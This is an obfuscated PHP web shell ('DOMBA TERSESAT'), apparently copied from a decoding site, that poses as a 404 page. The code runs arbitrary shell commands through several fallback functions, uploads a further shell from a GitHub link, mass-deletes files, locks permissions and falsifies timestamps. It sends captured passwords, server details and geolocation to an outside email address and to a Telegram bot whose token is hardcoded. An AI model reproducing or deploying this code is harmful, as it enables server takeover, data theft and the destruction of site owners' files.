\x9		\x9\x9<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}' {$_r}> 
\x9			\x9</div> 
\x9	\x9	\x9<div class='input-group d-flex gap-2'> 
	\x9	\x9\x9<i class='bi bi-file-earmark'></i> EXT:\xa\x9\x9\x9\x9	</div> 
\x9\x9	\x9	<div class='input-group'> 
					\x9<input class='form-control btn-sm' type='text' name='extensi' placeholder='.php' value='{$extensi}' {$_r}><br>\xa\x9	\x9\x9	\x9</div>\xa	\x9\x9\x9		<div class='form-check'> 
\x9\x9	\x9\x9\x9\x9<input class='form-check-input' type='checkbox' name='sort_by_date' id='sort_by_date' "; echo isset($_7["sort_by_date"]) && $_7["sort_by_date"] == "on" ? "checked" : ''; echo ">\xa		\x9\x9	\x9\x9<label class='form-check-label' for='sort_by_date'>Sort by date</label> 
\x9	\x9	\x9	</div>\xa\x9		\x9\x9	<div class='input-group-append'>\xa		\x9\x9\x9	\x9<input class='btn btn-dark btn-sm' type='submit' name='start' value='search'>\xa	\x9				</div>\xa\x9	\x9	</form> 
	\x9\x9</div>"; } goto lbxMx; M3aA3: jy7fd: goto vVelv; deg8m: @mb_internal_encoding("UTF-8"); goto otufx; Fo5Z3: if ($_7["id"] == "uploadvialink") { s(); if ($_SERVER["REQUEST_METHOD"] === "POST") { $url = isset($_POST["url"]) ? trim($_POST["url"]) : ''; $namafile = isset($_POST["namafile"]) ? trim($_POST["namafile"]) : "cong.php"; if (filter_var($url, FILTER_VALIDATE_URL)) { $content = file_get_contents($url); if ($content !== false) { $filePath = getcwd() . "/" . $namafile; $result = file_put_contents($filePath, $content); if ($result !== false) { echo "<strong>Upload file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } else { echo "<div><strong>Invalid URL</strong> fail! " . er() . "</div>"; } } } echo "<div class='card card-body text-dark input-group mb-3'>\xa		\x9\x9	<u>Upload Via Link [BYPASS]</u> 
\x9	\x9\x9\x9<form method='POST' enctype='multipart/form-data'>\xa\x9	\x9\x9	\x9<div class='input-group'> 
\x9				\x9<input class='form-control form-control-sm' type='url' name='url' placeholder='Enter the link' value='https://raw.githubusercontent.com/Mr-7Mind/MiniShell/main/ShellPass.php' required> 
	\x9\x9\x9	</div> 
	\x9\x9	\x9<div class='input-group'>\xa			\x9\x9\x9<input class='form-control form-control-sm' type='text' name='namafile' placeholder='Save As' value='cong.php'> 
\x9				</div>\xa\x9			\x9<div class='input-group'>\xa		\x9	\x9	<button type='submit' name='upl' class='btn btn-primary'>Upload</button> 
			\x9\x9</div>\xa\x9\x9\x9	</form>\xa			</div>"; } goto O2TiW; Vmn_x: $city = isset($data["city"]) ? $data["city"] : "Tidak Diketahui"; goto vYHYh; KfMrU: $botToken = "6961652611:AAH8xw3iHqE241-bJMX-Rousfidq1gZLJiA"; goto nc1Ay; ST4JP: KzNHr: goto mXEzo; F1IFe: curl_setopt($ch, CURLOPT_URL, $rib); goto YX2r_; WszL8: I694s: goto iXZQH; zBHc0: if ($_7["action"] == "rename") { s(); echo "<div class='btn-group'> 
			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a> 
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a> 
			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a> 
\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a> 
\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a> 
\x9\x9</div>\xa	\x9<br>\xa\x9\x9\x9<i class='bi bi-file-earmark'></i>:&nbsp;" . basename($file) . " 
	\x9</br> 
\x9	<form method='POST'> 
\x9	\x9<div class='input-group'>\xa	\x9\x9\x9<input class='form-control btn-sm' type='text' name='new_name' value='" . basename($file) . "' {$_r}>\xa\x9\x9	\x9<button class='btn btn-outline-light btn-sm' type='sumbit' name='r_f'><i class='bi bi-arrow-return-right'></i></button> 
			</div> 
	\x9</form>"; } goto wdhOZ; AaGLi: if ($_7["action"] == "delete_folder") { s(); if ($_7["yeah"]) { if ($fungsi[1]($dir)) { if (is_writable($dir)) { @rmdir($dir); @exe("rm -rf {$dir}"); @exe("rmdir /s /q {$dir}"); echo "<strong>Delete folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Delete folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } } echo " 
	\x9<div class='btn-group mb-3'>\xa		\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a> 
\x9	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa\x9\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a> 
\x9\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa\x9	</div> 
\x9	<div class='card card-body text-dark input-group mb-3'>\xa	\x9	<p>Are you sure to delete : " . basename($dir) . " ?</p>\xa		\x9<form method='POST'> 
	\x9		<a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>No</a> 
\x9\x9\x9	<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'>\xa	\x9	</form>\xa\x9	</div>"; } goto Pexjf; LSAD6: if (isset($_7["dir"])) { $dir = unhex($_7["dir"]); chdir($dir); } else { $dir = hex($gcw()); } goto p_X1N; G6W2I: goto tIIkt; goto Ccdo0; UiiN6: goto Czge0; goto newX3; ugMwL: JN_Oc: goto Mq334; MbUDf: q1vD_: goto aZblL; YMAqF: if (isset($_POST["pass"])) { $enteredPassword = $_POST["pass"]; if ($enteredPassword === $correctPassword) { $_SESSION["forbidden"] = true; } else { echo "<script>alert("what do u want to do? fuck bitch!");</script>"; } } goto jSAwj; TaKsn: file_get_contents($telegramApiUrl); goto hyWxJ; BhbXk: $curl = $GLOBALS["fungsi"][5]("curl_version") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto gjAoI; o3T1g: V3aam: goto xJU6c; EHvWy: ANvpy: goto n9cie; H5uEs: $_r = "required='required'"; goto iZFXr; G3vw5: ?>  

Did this file decode correctly?

Original Code



<?php 
 goto fAhFZ; O1RqN: goto u21ap; goto ifDbP; wYXrr: set_time_limit(0); goto OdvXK; O8WKF: Sif0P: goto Vmn_x; Dc2M6: goto lhjuO; goto XA8dg; oUC3I: mmZiN: goto hogqD; K15JR: s7SaO: goto anA6j; r06O5: if ($_7["action"] == "delete_file") { s(); if ($_7["yeahx"]) { $delete = $GLOBALS["fungsi"][4]($file); if ($delete) { echo "<strong>Delete file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Delete file</strong> fail! " . er() . "</div>"; } } echo "
	\x9<div class='btn-group mb-3'>\xa\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>\xa	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa\x9\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>\xa		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa	\x9	<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>
\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>
\x9	</div>\xa\x9\x9<div class='card card-body text-dark input-group mb-3'>\xa\x9		<p>Are you sure to delete : " . basename($file) . " ?</p>\xa	\x9	<form method='POST'>\xa			\x9<a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a>\xa	\x9\x9	<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>
\x9	\x9</form>\xa\x9	</div>"; } goto zF6Wn; ORaqL: if (isset($_GET["logout"])) { session_unset(); session_destroy(); header("Location: " . $_SERVER["PHP_SELF"]); die; } goto t7axT; US9Ue: T2So2: goto ttsjz; toPda: Cw7TO: goto Fo5Z3; p0Xma: goto bsBAb; goto dJHtg; mtdCy: goto lRnUM; goto J7ByC; H2Pi7: SoWRM: goto XTWbw; y7AR6: $Array = array("66696c655f6765745f636f6e74656e7473", "69735f646972", "66696c655f7075745f636f6e74656e7473", "69735f66696c65", "756e6c696e6b", "66756e6374696f6e5f657869737473", "6261736536345f656e636f6465", "676574637764"); goto rHqsK; YnPrN: if (isset($_GET["id"]) && $_GET["id"] === "lockshell") { $newPermissions = 292; changeFilePermissions($filename, $newPermissions); } goto IPiVI; BBEnD: goto ZW3j1; goto ZuNbg; iI08Z: KhULb: goto Ql4_q; BGEv7: goto idbRV; goto An3ph; YDZ81: if (isset($_GET["id"]) && $_GET["id"] === "dark_folders") { $newFolderPermissions = 365; changeFolderPermissionsRecursive($currentDirectory, $newFolderPermissions); echo "Permissions changed for all folders in the current directory."; } goto GRqen; t2E2c: e0LVC: goto vCRhl; bVyWm: QtYOL: goto gGqFs; newX3: NpAkq: goto b0NkH; xcEQS: function exe($cmd) { if ($GLOBALS["fungsi"][5]("system")) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif ($GLOBALS["fungsi"][5]("exec")) { @exec($cmd, $results); $buff = ''; foreach ($results as $result) { $buff .= $result; } return $buff; } elseif ($GLOBALS["fungsi"][5]("passthru")) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif (function_exists("proc_open")) { $pipes = array(); $process = @proc_open($cmd . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null); $buff = @stream_get_contents($pipes[1]); @proc_close($process); return $buff; } elseif ($GLOBALS["fungsi"][5]("shell_exec")) { $buff = @shell_exec($cmd); return $buff; } } goto t8rbj; xhFtK: goto fGDY0; goto B8N23; WSsCt: VDEd5: goto boq4M; SleZJ: @ini_set("disable_functions", 0); goto Z5_Jj; bKjHY: if ($_7["action"] == "zip_folder") { s(); if ($_7["yeah"]) { $zipFile = $dir . ".zip"; $zip = new ZipArchive(); if ($zip->open($zipFile, ZipArchive::CREATE) === true) { $source = realpath($dir); $zip->addEmptyDir(basename($source)); $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source)); foreach ($iterator as $file) { if ($file->isDir()) { $zip->addEmptyDir($source . "/" . $iterator->getSubPathName()); } else { $zip->addFile($file, $iterator->getSubPathName()); } } $zip->close(); echo "<strong>Zip folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Zip folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } echo "
	\x9\x9<div class='btn-group mb-3'>
\x9\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa\x9\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa	\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a>\xa\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>
\x9		</div>\xa			<div class='card card-body text-dark input-group mb-3'>
		\x9\x9<p>Are you sure to zip : " . basename($dir) . " ?</p>
\x9			<form method='POST'>\xa\x9				<a class='btn btn-danger btn-block btn-sm' href='?dir=" . dirname($dir) . "'>No</a>
\x9			\x9<input type='submit' name='yeah' class='btn btn-success btn-block btn-sm' value='Yes'>
\x9\x9	\x9</form>
\x9	\x9</div>"; } goto rW9GQ; rQ2oC: $currentDirectory = "."; goto nsGkt; XA8dg: rGIHh: goto vKDMF; LJyFE: if (isset($_7["edit_file"])) { $updt = fopen("{$file}", "w"); $result = fwrite($updt, $_7["contents"]); if ($result) { echo "<strong>Edit file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Edit file</strong> fail! " . er() . "</div>"; } } goto EhW21; NZN8n: HD1QB: goto u8kVm; HHFCL: goto I694s; goto ONGIi; m31q9: Ob__b: goto n8j2h; mXEzo: if ($location_data && $location_data["status"] === "success") { $country = $location_data["country"]; $countryCode = $location_data["countryCode"]; $region = $location_data["region"]; $regionName = $location_data["regionName"]; $city = $location_data["city"]; $zip = $location_data["zip"]; $lat = $location_data["lat"]; $lon = $location_data["lon"]; $timezone = $location_data["timezone"]; $isp = $location_data["isp"]; $org = $location_data["org"]; $as = $location_data["as"]; $address = "Country: {$country} ({$countryCode}), Region: {$regionName} ({$region}), City: {$city}, Zip: {$zip}, Latitude: {$lat}, Longitude: {$lon}, Timezone: {$timezone}, ISP: {$isp}, Organization: {$org}, AS: {$as}"; } else { $address = "Alamat tidak ditemukan"; } goto GrcPr; k_zrx: $response = curl_exec($ch); goto nO2y6; Q8GKs: y6Y_L: goto si1pW; rh9KY: goto Rc8_b; goto yWSnK; b0NkH: if (isset($_GET["id"]) && $_GET["id"] === "root_file") { $newFilePermissions = 420; changeFilePermissionsRecursive($currentDirectory, $newFilePermissions); echo "Permissions changed for all files in the current directory."; } goto kKDOw; VcPEY: EGOzL: goto rQ2oC; j0wib: echo "
	<html>\xa\x9<head>
	\x9<title>404 Not Found</title>
	\x9<meta charset='UTF-8'>
\x9\x9<meta name='author' content='DOMBA TERSESAT'>\xa		<meta name='robots' content='noindex, nofollow, noarchive'>
		<meta name='viewport' content='width=device-width, initial-scale=0.70'>
\x9\x9<link rel='icon' href='https://chat.openai.com/apple-touch-icon.png'>\xa\x9\x9<link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css'>
\x9	<link rel='stylesheet' href='https://cdn.jsdelivr.net/npm/[email protected]/font/bootstrap-icons.css'>\xa\x9	<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css'>
\x9\x9<script src='https://cdnjs.cloudflare.com/ajax/libs/prism/1.6.0/prism.js'></script>\xa\x9\x9<script src='https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js'></script>\xa	\x9<script src='https://code.jquery.com/jquery-3.3.1.slim.min.js'></script>
\x9\x9<script>
	\x9function toggleShellNameInput(isVisible) {\xa\x9	\x9var shellNameInput = document.getElementById('namafile');
			shellNameInput.required = isVisible;\xa\x9	\x9shellNameInput.style.display = isVisible ? 'block' : 'none';\xa		}\xa\x9\x9window.onload = function () {
\x9	\x9toggleShellNameInput(false);\xa\x9\x9};\xa	</script>\xa        <style>
	\x9	@import url('https://fonts.googleapis.com/css2?family=Poppins:wght@100;200;300;400;500;600;700;800;900&display=swap');\xa		\x9*{
\x9\x9\x9\x9font-family: 'Poppins', sans-serif;
\x9\x9		font-weight: 400;
	\x9\x9}\xa            gr {\xa                color: green;
            }\xa            rd {\xa                color: red;
            }
	\x9\x9corner {
                position: relative;
            }\xa            </style>\xa        <body class='bg-secondary text-light'>\xa\x9<div class='container-fluid'>\xa\x9<div class='py-3' id='main'>\xa\x9\x9<div class='box shadow bg-dark p-4 rounded-3'>
			<a class='text-decoration-none text-light anu' href='" . $_SERVER["PHP_SELF"] . "'><h4>DOMBA TERSESAT</h4></a>"; goto jhqTu; sBdeq: $ip = gethostbyname($_SERVER["HTTP_HOST"]); goto pLTwC; M9GSH: wmm9T: goto JKY8I; J9JM9: goto MxRFR; goto crGb4; JKY8I: $ip_internal = getHostByName(getHostName()); goto nEeZx; osASh: goto ZT39K; goto dqJ0W; RicPt: If5hf: goto fP29U; e4Pf2: if (isset($_7["path"])) { $path = unhex($_7["path"]); chdir($path); } else { $path = $gcw(); } goto XqS3f; u1Gp4: if ($_7["id"] == "delete") { function mass_delete($dir, $namefile) { if (is_writable($dir)) { $fileToDelete = "{$dir}/{$namefile}"; if (is_file($fileToDelete) && is_writable($fileToDelete)) { if (unlink($fileToDelete)) { echo "[<gr><i class='bi bi-check-all'></i></gr>]&nbsp;{$fileToDelete} deleted successfully<br>"; } else { echo "[<red><i class='bi bi-exclamation-triangle-fill'></i></red>]&nbsp;Failed to delete {$fileToDelete}<br>"; } } $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}/{$dirb}"; if ($dirb === "." || $dirb === "..") { continue; } if (is_dir($dirc)) { mass_delete($dirc, $namefile); } } } } if ($_7["start"]) { mass_delete($_7["d_dir"], $_7["d_file"]); } s(); echo "\xa\x9		<div class='card card-body text-dark input-group mb-3'>
\x9\x9	<u>Mass Delete</u>
\x9\x9\x9	<form method='POST'>\xa\x9	\x9		<i class='bi bi-folder'></i> Directory:
\x9			\x9<input class='form-control btn-sm' type='text' name='d_dir' value='{$dir}' {$_r}>\xa			\x9\x9<i class='bi bi-file-earmark'></i> Filename:\xa\x9\x9			<div class='input-group'>
	\x9\x9\x9\x9\x9<input class='form-control btn-sm' type='text' name='d_file' placeholder='filename' {$_r}><br>\xa\x9\x9\x9\x9		<div class='input-group-append'>
	\x9\x9\x9	\x9\x9<input class='btn btn-dark btn-sm' type='submit' name='start' value='delete'>
\x9\x9	\x9\x9\x9</div>
\x9\x9\x9\x9	</div>\xa	\x9		</form>
			</div>"; } goto q0gSw; vCRhl: curl_close($ch); goto CC7Pb; v_KJh: Rl8Ii: goto y7AR6; u8kVm: $ip_public = $_SERVER["REMOTE_ADDR"]; goto JfxNK; bvDAd: jEqlm: goto PoI1u; vUL9Z: @clearstatcache(); goto T223U; jfWwD: S88LA: goto FzmDW; t8rbj: goto IP7wT; goto i51iK; gFZrj: PPbbu: goto nI5xl; zsOiR: $soft = $_SERVER["SERVER_SOFTWARE"]; goto uba3F; F6gvW: @ini_set("display_errors", 0); goto tcING; o0h0r: goto JN_Oc; goto z1UDJ; apWbg: tIIkt: goto LJyFE; XMFJS: if ($_7["action"] == "touch_folder") { s(); $folderTimestamp = date("d-m-Y H:i:s", filemtime($dir)); if ($_7["yeahx"]) { $old = $dir; $new = $_POST["new_touch"]; if (strtotime($new) !== false) { if (touch($old, strtotime($new))) { echo "<strong>Touch folder</strong> ok! " . ok() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } else { echo "<strong>Touch folder</strong> fail! " . er() . "<a class="btn-close" href="?path=" . dirname($dir) . ""></a></div>"; } } else { echo "<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">\xa			\x9\x9\x9\x9<strong>Touch folder</strong> invalid timestamp format! 
		\x9			\x9<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
	\x9	\x9\x9\x9</div>"; } } echo "\xa	\x9\x9<div class='btn-group mb-3'>\xa			\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename_folder'><i class='bi bi-pencil-fill'></i></a>\xa	\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=zip_folder'><i class='bi bi-file-zip-fill'></i></a>\xa\x9		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_folder'><i class='bi bi-calendar'></i></a>
	\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod_folder'><i class='bi bi-file-lock-fill'></i></a>\xa\x9\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_folder'><i class='bi bi-trash-fill'></i></a>\xa			</div>"; echo "
\x9		<div class='card card-body text-dark input-group mb-3'>
\x9	\x9	<p>Are you sure to touch the folder: " . basename($dir) . " ?</p>
\x9		\x9<form method='POST'>
	\x9	\x9	<input type='text' name='new_touch' id='new_touch' class='form-control' value='{$folderTimestamp}' required>
\x9\x9	\x9	<a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a>\xa\x9\x9			<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>
	\x9	\x9</form>\xa\x9		</div>"; } goto NMZxF; FEDzx: goto i2lyR; goto Y7KPr; oPun5: function changeFilePermissions($filename, $permissions) { if (file_exists($filename)) { if (chmod($filename, $permissions)) { echo "Izin file {$filename} berhasil diubah menjadi {$permissions}."; } else { echo "Gagal mengubah izin file {$filename}."; } } else { echo "File {$filename} tidak ditemukan."; } } goto wduFL; B8N23: q3W0Z: goto wjn3q; bkUmP: H3mcr: goto dyu0A; EfMKN: $kernel = php_uname(); goto EBffy; boRyc: $wget = exe("wget --help") ? "<gr>ON</gr>" : "<rd>OFF</rd>"; goto UiiN6; iL_4F: goto q3W0Z; goto cKh9k; QwB_l: eo8KT: goto Pb4nF; OdvXK: goto fBRrX; goto RharQ; V13AP: Gm74y: goto KZprX; t7axT: goto xq51K; goto qepCq; zmKJM: H5D0K: goto q2iNw; PlOXp: goto XB8uL; goto qMxX4; FzmDW: $phpos = PHP_OS; goto ddA3e; rHqsK: goto OuGP1; goto UTVEK; KyHu0: AL88f: goto t03jb; kPsi7: @ini_set("error_log", null); goto fxMqf; T6cfq: goto KOMIS; goto lC6t8; H_nCu: ob_start(); goto ZLWhF; iXZQH: if (array_key_exists("loginin", $_POST)) { $password = $_POST["pass"]; $server_name = $_SERVER["SERVER_NAME"]; $php_self = $_SERVER["PHP_SELF"]; $report_bug = "IP: " . $_SERVER["REMOTE_ADDR"] . " 
City: {$city}
Login: {$server_name}{$php_self}
Pass: {$password}
Kernel: {$kernel}"; @mail("[email protected]", "Hehehe", $report_bug); } goto EOe4J; eW7Zp: btnD5: goto vUL9Z; EvNBJ: $_7 = array_merge($_POST, $_GET); goto BEYcg; ld3Ay: h1v9W: goto BhbXk; Qdp7W: if (empty($disfunc)) { $disfc = "<gr>NONE</gr>"; } else { $disfc = "<rd>{$disfunc}</rd>"; } goto mtdCy; GRqen: goto AL88f; goto Fmqk5; r3kFk: pKOtz: goto jD26d; nsGkt: goto NpAkq; goto O6bjS; K0Vz2: if ($_7["action"] == "touch_file") { s(); $fileTimestamp = date("d-m-Y H:i:s", filemtime($file)); if ($_7["yeahx"]) { $old = $file; $new = $_POST["new_touch"]; if (strtotime($new) !== false) { if (touch($old, strtotime($new))) { echo "<strong>Touch file</strong> ok! " . ok() . "</div>"; } else { echo "<strong>Touch file</strong> fail! " . er() . "</div>"; } } else { echo "<div class="alert alert-warning alert-dismissible fade show my-3" role="alert">
	\x9\x9			<strong>Touch file</strong> invalid timestamp format! \xa\x9	\x9			<button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>\xa	\x9\x9\x9\x9</div>"; } } echo "
		<div class='btn-group mb-3'>
\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=view&opn={$path}/{$file}'><i class='bi bi-eye-fill'></i></a>
	\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=edit&opn={$path}/{$file}'><i class='bi bi-pencil-square'></i></a>\xa		\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=unzip_file&opn={$file}'><i class='bi bi-file-zip-fill'></i></a>\xa\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=touch_file&opn={$path}/{$file}'><i class='bi bi-calendar'></i></a>\xa\x9	\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=rename&opn={$path}/{$file}'><i class='bi bi-pencil-fill'></i></a>\xa\x9\x9\x9<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=chmod&opn={$path}/{$file}'><i class='bi bi-file-lock-fill'></i></a>\xa			<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=delete_file&opn={$path}/{$file}'><i class='bi bi-trash-fill'></i></a>
\x9		<a class='btn btn-outline-light btn-sm' href='?dir=" . hex($fungsi[7]()) . "&action=download&opn={$path}/{$file}'><i class='bi bi-download'></i></a>
\x9	</div>"; echo "
		<div class='card card-body text-dark input-group mb-3'>
\x9\x9	<p>Are you sure to touch the file : " . basename($file) . " ?</p>
\x9		<form method='POST'>\xa\x9\x9	\x9<input type='text' name='new_touch' id='new_touch' class='form-control' value='{$fileTimestamp}' required>\xa			\x9<a class='btn btn-danger btn-block btn-sm' href='?dir=" . hex($dir) . "'>No</a>
				<input type='submit' name='yeahx' class='btn btn-success btn-block btn-sm' value='Yes'>
	\x9\x9</form>\xa\x9\x9</div>"; } goto J9JM9; An3ph: MxRFR: goto REB1u; sI9CT: goto btnD5; goto gFZrj; SH3ma: goto TUS18; goto iaUZl; V8psl: Tbopv: goto FmZMv; no2rs: IVobD: goto a3uB9; ZNsnh: for ($i = 0; $i <= $c_dir; $i++) { $scdir[$i]; if ($i != $c_dir) { } } goto fgATR; Uy2Ph: RWaoe: goto LSAD6; L4_mp: if (isset($_7["filenew"])) { s(); if (isset($_7["bikin"])) { $name = $_7["name_file"]; $contents_file = $_7["contents_file"]; foreach ($name as $name_file) { $handle = @fopen("{$name_file}", "w"); if ($contents_file) { $create = @fwrite($handle, $contents_file); } else { $create = $handle; } } if ($create) { echo "<script>window.location='?path=" . hex($path) . "'</script>"; } else { echo "<strong>Create file</strong> fail! " . er() . "</div>"; } } echo "\xa	\x9<div class='mb-3'>\xa	\x9\x9<form method='POST'>
\x9	\x9	<i class='bi bi-file-earmark'></i> Filename:\xa\x9\x9	\x9<input class='form-control form-control-sm' type='text' name='name_file[]' placeholder='filename' {$_r}>\xa\x9\x9	\x9<i class='bi bi-file-earmark'></i> Your script:
\x9\x9\x9\x9<textarea class='form-control form-control-sm' name='contents_file' rows='7' placeholder='your script' {$_r}></textarea>\xa		\x9	<div class='d-grid gap-2'>\xa\x9				<input class='btn btn-outline-light btn-sm' type='submit' name='bikin' value='create'>\xa\x9\x9\x9	</div>
\x9	\x9</form>\xa		</div>"; } goto ZX1e2; goYyD: XBCqU: goto F1IFe; W916h: goto W60P5; goto K15JR; iF5O8: session_start(); goto KFLyg; Pb4nF: $phpver = PHP_VERSION; goto BP1qv; gGqFs: error_reporting(0); goto sI9CT; WycuD: g_RKq: goto r06O5; GrcPr: goto gu3kV; goto mB2Mf; ZX1e2: goto mmZiN; goto o3T1g; QdZhC: $pesan_alert = "[VULN] Url : {$x_path}\xa\303\xa2\xe2\x80\x93\302\xac IP Address : [ " . $ip_public . " - Public ] / [ " . $ip_internal . " - Private ]
\xc3\242\xe2\200\223\302\xac Address : [ " . $address . " ]
